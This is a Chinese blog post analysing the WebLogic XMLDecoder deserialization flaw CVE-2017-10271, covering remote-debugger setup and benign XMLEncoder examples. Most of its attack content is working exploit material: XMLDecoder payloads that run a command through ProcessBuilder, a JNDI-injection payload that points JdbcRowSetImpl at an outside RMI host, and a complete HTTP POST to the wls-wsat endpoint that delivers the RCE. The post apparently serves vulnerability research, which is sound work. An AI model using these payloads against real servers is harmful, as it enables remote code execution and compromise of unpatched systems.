Fork me on GitHub

weblogic远程调试XMLDecoder RCE CVE-2017-10271

首先说一下远程调试的配置,首先在weblogic的启动文件加入如下配置,开启服务器远程调试端口就是9999:
Alt text
第二步,建立一个java的空项目。
第三步将weblogic的所有jar包拷出来,放到一个文件中。
Alt text
第四步把jar包导入idea的lib配置中
Alt text
第五步添加一个remote,端口修改为9999
Alt text
在加入的jar包打断点后,点击debug小瓢虫的图标就能进一步调试了
Alt text
下面开始说xmldecoder的反序列化:
xmldecode,xmlendoer是将xml文件转化成java bean,简单的小例子如下:
XMLTest.java

package me.lightless.shiro;

import java.beans.XMLEncoder;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileInputStream;
import java.io.FileOutputStream;
public class XMLTest {
        public void xmlEncode() throws Exception
         {
         MyInfo my = new MyInfo();
         my.setMyage(25);
         my.setMyName("google");
         my.setMyaddress("china");
         my.setMyEducation("master in science");

        XMLEncoder encoder = new XMLEncoder(
        new BufferedOutputStream(
        new FileOutputStream("myinfo.xml")));
         encoder.writeObject(my);
         encoder.close();
         System.out.println(my);
         }
         public void xmlDecode() throws Exception
         {
         java.beans.XMLDecoder decoder = new java.beans.XMLDecoder(
         new BufferedInputStream(new FileInputStream("myinfo.xml")));
         MyInfo my = (MyInfo)decoder.readObject();
         decoder.close();
         System.out.println(my);
         System.out.println("Your age: "+my.getMyage());
        }
         public static void main (String args[]) throws Exception {
         XMLTest st = new XMLTest();
         st.xmlEncode();
         st.xmlDecode();
         }
        }

MyInfo.java

package me.lightless.shiro;

public class MyInfo {
    private int myage;

    public int getMyage() {
        return myage;
    }

    public void setMyage(int myage) {
        this.myage = myage;
    }

    public String getMyName() {
        return myName;
    }

    public void setMyName(String myName) {
        this.myName = myName;
    }

    public String getMyaddress() {
        return myaddress;
    }

    public void setMyaddress(String myaddress) {
        this.myaddress = myaddress;
    }

    public String getMyEducation() {
        return myEducation;
    }

    public void setMyEducation(String myEducation) {
        this.myEducation = myEducation;
    }

    private String myName;
    private String myaddress;
    private String myEducation;
}

运行结果:
Alt text
如果xml传入的是恶意代码,就能导致命令执行:
XmlDecoderTest.java

package me.lightless.shiro;

import java.beans.XMLDecoder;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

public class XmlDecoderTest {

    public static void main(String[] args) {
        // TODO Auto-generated method stub
        java.io.File file = new java.io.File("E:\\Struts2-Vulenv-master\\Java-Unserialization-Study\\src\\main\\java\\me\\lightless\\shiro\\xmldecoder.xml");
        java.beans.XMLDecoder xd = null;
        try {
            xd = new XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
        } catch (FileNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

        Object s2 = xd.readObject();
        xd.close();
    }

}

如下三种payload能够弹计算器:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java>
<java version="1.4.0" class="java.beans.XMLDecoder">
    <new class="java.lang.ProcessBuilder">
        <string>calc</string><method name="start" />
    </new>
</java>

这个payload参考这个连接jndi注入
简单跟一下jndi注入:
payload如下:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_121" class="java.beans.XMLDecoder">
    <void class="com.sun.rowset.JdbcRowSetImpl">
        <void property="dataSourceName">
         <string>rmi://121.195.170.127:2222/aa</string>
        </void>
        <void property="autoCommit">
            <boolean>true</boolean>
        </void>
    </void>
</java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

autoCommit设置为true

将构造的rmi地址传入lookup触发漏洞

当jdk为1.8以上时需要设置trustURLCodebase为true,代码执行到com.sun.jndi.rmi.registry.RegistryContext

抛出如下异常导致rce失败。

trustURLCodebase为true怎么设置需要看下手册,留个坑
https://paper.tuisec.win/detail/a5927ff39106516

<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <void class="com.sun.rowset.JdbcRowSetImpl">
        <void property="dataSourceName">
            <string>rmi://localhost:1099/Exploit</string>
        </void>
        <void property="autoCommit">
            <boolean>true</boolean>
        </void>
    </void>
</java>

Alt text
提交如下payload:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 603

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

C:\Users\Administrator\Desktop\lib\weblogic.jar!\weblogic\wsee\jaxws\workcontext\WorkContextServerTube.class在40行下断点,传入的参数。
Alt text
跟进readHeaderOld,跟进WorkContextXmlInputAdapter
Alt text
跟进行XMLDecoder,var1则是我们传入的payload
Alt text
调用的栈信息如下:
Alt text
参考链接:
https://paper.seebug.org/487/
https://blog.csdn.net/defonds/article/details/83510668#_39
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices%E7%BB%84%E4%BB%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.md

posted @ 2019-01-04 20:30  Afant1  阅读(1180)  评论(0编辑  收藏  举报